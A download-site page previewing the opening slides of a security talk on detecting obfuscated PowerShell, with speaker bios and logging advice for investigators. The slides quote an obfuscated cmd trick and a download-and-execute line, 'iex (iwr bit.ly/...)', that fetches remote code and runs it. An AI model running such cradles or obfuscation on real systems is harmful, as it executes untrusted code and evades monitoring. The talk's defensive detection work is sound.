没有合适的资源?快使用搜索试试~ 我知道了~
藏经阁-Revoke-Obfuscation.pdf
需积分: 5 0 下载量 43 浏览量
2023-09-09
17:23:19
上传
评论
收藏 5.11MB PDF 举报
温馨提示
试读
155页
藏经阁-Revoke-Obfuscation.pdf
资源推荐
资源详情
资源评论
Revoke-Obfuscation
> PowerShell Obfuscation Detection Using Science
Daniel Bohannon - @danielhbohannon
Lee Holmes - @Lee_Holmes
0.0/00
> Whois
0.0/00
- MANDIANT Senior Applied Security Researcher
- Invoke-Obfuscation, Invoke-CradleCrafter
- Obfuscation, evasion and detection techniques
- @danielhbohannon
Title . @Speaker . Location
%ProgramData:~0,1%%ProgramData:~9,2% /c echo OBFUSCATION_FTW!
> Whois
0.0/00
- Lead security architect of Azure Management @ MS
- Author of the Windows PowerShell Cookbook
- Original member of PowerShell Development Team
- @Lee_Holmes
Title . @Speaker . Location
iex (iwr bit.ly/e0Mw9w)
0.0/00
Title . @Speaker . Location
Preparing Your Environment for Investigations
• Logs (and retention) are your friend 1) enable 2) centralize 3) LOOK/MONITOR
• Process Auditing AND Command Line Process Auditing 4688 FTW!
• https://technet.microsoft.com/en-us/library/dn535776.aspx
• SysInternals’ Sysmon is also a solid option
• Real-time Process Monitoring
• Uproot IDS - https://github.com/Invoke-IR/Uproot
• PowerShell Module, ScriptBlock, and Transcription logging
• https://blogs.msdn.microsoft.com/powershell/2015/06/09/powershell-the-blue-team/
• https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
剩余154页未读,继续阅读
资源评论
weixin_40191861_zj
- 粉丝: 62
- 资源: 1万+
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功